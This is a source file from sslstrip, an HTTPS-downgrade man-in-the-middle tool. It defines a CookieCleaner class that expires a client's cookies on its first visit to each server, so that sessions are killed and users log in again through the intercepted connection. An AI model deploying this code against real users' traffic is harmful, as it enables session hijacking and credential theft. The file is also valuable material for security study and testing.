Path: blob/master/sslstrip-work-2019/sslstrip/CookieCleaner.py
1306 views
# Copyright (c) 2004-2011 Moxie Marlinspike1#2# This program is free software; you can redistribute it and/or3# modify it under the terms of the GNU General Public License as4# published by the Free Software Foundation; either version 3 of the5# License, or (at your option) any later version.6#7# This program is distributed in the hope that it will be useful, but8# WITHOUT ANY WARRANTY; without even the implied warranty of9# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU10# General Public License for more details.11#12# You should have received a copy of the GNU General Public License13# along with this program; if not, write to the Free Software14# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-130715# USA16#1718import logging19import string2021class CookieCleaner:22'''This class cleans cookies we haven't seen before. The basic idea is to23kill sessions, which isn't entirely straight-forward. Since we want this to24be generalized, there's no way for us to know exactly what cookie we're trying25to kill, which also means we don't know what domain or path it has been set for.2627The rule with cookies is that specific overrides general. So cookies that are28set for mail.foo.com override cookies with the same name that are set for .foo.com,29just as cookies that are set for foo.com/mail override cookies with the same name30that are set for foo.com/3132The best we can do is guess, so we just try to cover our bases by expiring cookies33in a few different ways. The most obvious thing to do is look for individual cookies34and nail the ones we haven't seen coming from the server, but the problem is that cookies are often35set by Javascript instead of a Set-Cookie header, and if we block those the site36will think cookies are disabled in the browser. So we do the expirations and whitlisting37based on client,server tuples. The first time a client hits a server, we kill whatever38cookies we see then. After that, we just let them through. Not perfect, but pretty effective.3940'''4142_instance = None4344def getInstance():45if CookieCleaner._instance == None:46CookieCleaner._instance = CookieCleaner()4748return CookieCleaner._instance4950getInstance = staticmethod(getInstance)5152def __init__(self):53self.cleanedCookies = set();54self.enabled = False5556def setEnabled(self, enabled):57self.enabled = enabled5859def isClean(self, method, client, host, headers):60if method == "POST": return True61if not self.enabled: return True62if not self.hasCookies(headers): return True6364return (client, self.getDomainFor(host)) in self.cleanedCookies6566def getExpireHeaders(self, method, client, host, headers, path):67domain = self.getDomainFor(host)68self.cleanedCookies.add((client, domain))6970expireHeaders = []7172for cookie in headers['cookie'].split(";"):73cookie = cookie.split("=")[0].strip()74expireHeadersForCookie = self.getExpireCookieStringFor(cookie, host, domain, path)75expireHeaders.extend(expireHeadersForCookie)7677return expireHeaders7879def hasCookies(self, headers):80return 'cookie' in headers8182def getDomainFor(self, host):83hostParts = host.split(".")84return "." + hostParts[-2] + "." + hostParts[-1]8586def getExpireCookieStringFor(self, cookie, host, domain, path):87pathList = path.split("/")88expireStrings = list()8990expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + domain +91";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")9293expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + host +94";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")9596if len(pathList) > 2:97expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" +98domain + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")99100expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" +101host + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")102103return expireStrings104105106107108